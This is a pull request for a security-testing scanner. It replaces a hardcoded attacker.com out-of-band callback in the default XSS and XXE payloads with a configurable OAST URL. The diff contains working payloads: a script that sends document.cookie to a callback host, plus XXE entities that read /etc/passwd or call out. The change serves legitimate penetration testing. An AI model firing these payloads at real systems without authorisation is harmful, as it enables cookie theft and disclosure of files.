### PR TITLE
security: replace hardcoded attacker.com with configurable OAST callback

### DIFF
--- a/config/config.example.yaml
+++ b/config/config.example.yaml
@@ -75,6 +75,12 @@ scanner:
   # AI Provider selection
   ai_provider: "openai"  # Options: openai, claude, grok, ollama, mistral, openrouter
   
+  # Out-of-Band Application Security Testing (OAST) callback URL
+  # IMPORTANT: Set this to a server you control (e.g., Burp Collaborator, interact.sh)
+  # XSS and XXE payloads use this URL to detect out-of-band interactions.
+  # Leaving this empty uses a safe placeholder that won't leak data to third parties.
+  oast_callback_url: ""  # e.g., "https://your-id.oastify.com"
+
   # Network settings
   proxy: ""  # Proxy URL (e.g., http://127.0.0.1:8080)
   custom_headers: {}  # Custom headers as key-value pairs

--- a/core/ai_payload_generator.py
+++ b/core/ai_payload_generator.py
@@ -11,12 +11,23 @@ logger = get_logger(__name__)
 
 class AIPayloadGenerator:
     """Generate intelligent security testing payloads using AI."""
-    
+
+    # Placeholder domain for out-of-band (OOB) callback payloads.
+    # Users MUST replace this with their own OAST server (e.g., Burp Collaborator,
+    # interact.sh, or a self-hosted callback listener) before running scans.
+    # Using a domain you don't control risks leaking target data to third parties.
+    OAST_CALLBACK_URL = "{CALLBACK_URL}"
+
     def __init__(self, ai_manager, config: Dict):
         """Initialize the AI payload generator."""
         self.ai_manager = ai_manager
         self.config = config
         self.payload_config = config.get('vulnerability_scanner', {}).get('payload_generation', {})
+
+        # Allow users to configure their own OAST callback URL
+        callback_url = config.get('scanner', {}).get('oast_callback_url', '')
+        if callback_url:
+            self.OAST_CALLBACK_URL = callback_url
         
     def generate_payloads(self, context: Dict) -> Dict[str, List[str]]:
         """
@@ -121,7 +132,7 @@ Return only the payloads, one per line, without explanations."""
             "<iframe src=javascript:alert('XSS')>",
             "<body onload=alert('XSS')>",
             "javascript:alert('XSS')",
-            "<script>fetch('http://attacker.com?c='+document.cookie)</script>",
+            f"<script>fetch('{self.OAST_CALLBACK_URL}?c='+document.cookie)</script>",
             "<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycp'))>",
             "\"><script>alert(String.fromCharCode(88,83,83))</script>",
             "<svg><script>alert&#40;'XSS')</script>",
@@ -173,7 +184,7 @@ Return only the payloads, one per line, without explanations."""
         """Generate XXE payloads."""
         default_payloads = [
             '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
-            '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]><foo>&xxe;</foo>',
+            f'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "{self.OAST_CALLBACK_URL}/xxe">]><foo>&xxe;</foo>',
             '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">%xxe;]>',
         ]
         


### PR DESCRIPTION
## Summary
- **XSS and XXE payloads used `http://attacker.com` as the out-of-band callback domain** — a real, publicly-registered domain not controlled by tool operators
- Cookie data from XSS tests and XML parser responses from XXE tests were sent to this unknown third party
- Replaced with a safe `{CALLBACK_URL}` placeholder and a new `oast_callback_url` config option

## Security Impact
- **Before**: Running default payloads against a production target leaked session cookies and internal data to `attacker.com`
- **After**: Payloads use a non-resolvable placeholder by default; operators configure their own OAST server (Burp Collaborator, interact.sh, etc.)

## Changes
- `core/ai_payload_generator.py`: Added `OAST_CALLBACK_URL` class constant, configurable via `scanner.oast_callback_url` in config
- `config/config.example.yaml`: Added `oast_callback_url` option with documentation

## Test plan
- [ ] Verify XSS payloads contain `{CALLBACK_URL}` by default (not `attacker.com`)
- [ ] Verify setting `oast_callback_url: "https://my-oast.example.com"` replaces placeholder in generated payloads
- [ ] Verify XXE payloads also use the configured callback URL
- [ ] Run full scan to confirm no regressions

🤖 Generated with [Claude Code](https://claude.com/claude-code)